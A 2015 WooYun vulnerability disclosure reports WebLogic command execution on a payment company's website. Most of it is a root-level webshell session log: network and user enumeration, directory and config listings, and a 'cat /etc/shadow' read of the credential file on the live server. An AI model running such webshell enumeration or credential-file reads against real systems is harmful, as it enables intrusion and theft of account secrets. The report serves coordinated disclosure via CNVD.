
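Vulnerability summary

Bug ID: wooyun-2015-0162275

Title: A vulnerability at 联行支付 allows roaming the internal network

Vendor: 联行支付 ww.ecpay.cn

Author: 路人甲

Submitted: 2015-12-22 18:40

Fixed: 2016-02-07 18:35

Published: 2016-02-07 18:35

Vulnerability type: Command execution

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org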



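Vulnerability details

Disclosure status:

2015-12-22: Details reported to the vendor; awaiting vendor handling
2015-12-26: Vendor confirmed; details disclosed to the vendor only
2016-01-05: Details disclosed to core white hats and experts in related fields
2016-01-15: Details disclosed to regular white hats
2016-01-25: Details disclosed to intern white hats
2016-02-07: Details disclosed to the public

Brief description:

Detailed description:

http://**.**.**.**/ (the official website): WebLogic command execution
Shell:
http://**.**.**.**/jspspy.jspx

[Screenshot: ecpay1.png]


[Screenshot: ecpay2.png]


Stopping here; this company's network can be controlled.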

/bin/sh: line 4: ipconfig: command not found
ifconfig
eth0 Link encap:Ethernet HWaddr 6C:AE:8B:3B:5A:22
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::6eae:8bff:fe3b:5a22/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:149526305 errors:0 dropped:0 overruns:0 frame:0
TX packets:120117439 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15612327340 (14.5 GiB) TX bytes:111982525543 (104.2 GiB)
Memory:91a60000-91a80000
eth1 Link encap:Ethernet HWaddr 6C:AE:8B:3B:5A:23
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::6eae:8bff:fe3b:5a23/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:46606428 errors:0 dropped:0 overruns:0 frame:0
TX packets:48995860 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4062393812 (3.7 GiB) TX bytes:7061418128 (6.5 GiB)
Memory:91a40000-91a60000
lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:42370 errors:0 dropped:0 overruns:0 frame:0
TX packets:42370 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:9803631 (9.3 MiB) TX bytes:9803631 (9.3 MiB)
usb0 Link encap:Ethernet HWaddr 6E:AE:8B:3B:5A:21
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::6cae:8bff:fe3b:5a21/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:44321912 errors:0 dropped:0 overruns:0 frame:0
TX packets:44189494 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3626173772 (3.3 GiB) TX bytes:4234648024 (3.9 GiB)
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
ls
autodeploy
bin
config
console-ext
edit.lok
fileRealm.properties
http:
init-info
javax.servlet.context.tempdir
lib
nohup.out
pending
security
servers
startWebLogic.sh
tmp
pwd
/opt/weblogic103/user_projects/domains/mydomain
find -name weblogic.xml
./servers/AdminServer/upload/ech/WEB-INF/weblogic.xml
./servers/AdminServer/upload/eco20151012/WEB-INF/weblogic.xml
./servers/AdminServer/upload/eco/WEB-INF/weblogic.xml
./servers/AdminServer/upload/ech20151217/WEB-INF/weblogic.xml
./servers/AdminServer/upload/eco20151214/WEB-INF/weblogic.xml
./servers/AdminServer/upload/ecf/WEB-INF/weblogic.xml
./servers/AdminServer/upload/oldeco/WEB-INF/weblogic.xml
./servers/AdminServer/upload/eco.bak/WEB-INF/weblogic.xml
./servers/AdminServer/upload/ech20151214/WEB-INF/weblogic.xml
./servers/AdminServer/tmp/.appmergegen_1416791375320/ecd.war/30u8hq/WEB-INF/weblogic.xml
./servers/AdminServer/tmp/.appmergegen_1416791375320_ecd.war/WEB-INF/weblogic.xml
./servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/WEB-INF/weblogic.xml
./servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/WEB-INF/weblogic.xml
dir ../
mydomain
dir
autodeploy http: security
bin init-info servers
config javax.servlet.context.tempdir startWebLogic.sh
console-ext lib tmp
edit.lok nohup.out
fileRealm.properties pending
ls ../
mydomain
pwd
/opt/weblogic103/user_projects/domains/mydomain
ls /opt/weblogic103/
coherence_3.7
domain-registry.xml
logs
modules
ocm.rsp
registry.dat
registry.xml
user_projects
utils
wlserver_10.3
cat /opt/weblogic103/registry.xml
<?xml version="1.0" encoding="UTF-8"?>
<bea-product-information xmlns:fo="http://**.**.**.**/1999/XSL/Format" xmlns:gpr="http://**.**.**.**/ns/cie/gpr">
<host home="/opt/weblogic103" name="localhost.localdomain">
<product format="1.0" name="WebLogic Platform">
<release level="10.3" ServicePackLevel="6" PatchLevel="0" Status="installed" InstallTime="Aug 22, 2014 1:36:08 PM" InstallDir="/opt/weblogic103">
<component name="Common Infrastructure Engineering" version="**.**.**.**" InstallDir="">
<component name="Uninstall"/>
<component name="Patch Client"/>
<component name="Patch Attachment Facility"/>
<component name="Clone Facility"/>
</component>
<component name="WebLogic Server" version="**.**.**.**" InstallDir="/opt/weblogic103/wlserver_10.3">
<component name="Core Application Server"/>
<component name="Administration Console"/>
<component name="Configuration Wizard and Upgrade Framework"/>
<component name="Web 2.0 HTTP Pub-Sub Server"/>
<component name="WebLogic SCA"/>
<component name="WebLogic JDBC Drivers"/>
<component name="Third Party JDBC Drivers"/>
<component name="WebLogic Server Clients"/>
<component name="WebLogic Web Server Plugins"/>
<component name="UDDI and Xquery Support"/>
<component name="Evaluation Database"/>
<component name="Workshop Code Completion Support"/>
</component>
<component name="Oracle Configuration Manager" version="**.**.**.**" InstallDir="">
<component name="Data Collector"/>
</component>
<component name="Oracle Coherence" version="**.**.**.**" InstallDir="/opt/weblogic103/coherence_3.7">
<component name="Coherence Product Files"/>
</component>
</release>
</product>
</host>
</bea-product-information>
history
ls /root
anaconda-ks.cfg
Desktop
install.log
install.log.syslog
cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
**.**.**.** localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
cat /etc/shadow

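Proof of vulnerability:

Suggested fix:

Copyright notice: When reposting, please credit the source 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-12-26 23:38

Vendor reply:

CNVD has confirmed the situation described, and CNVD has notified the organization that operates the website through the contact details published on the site.

Latest status:

None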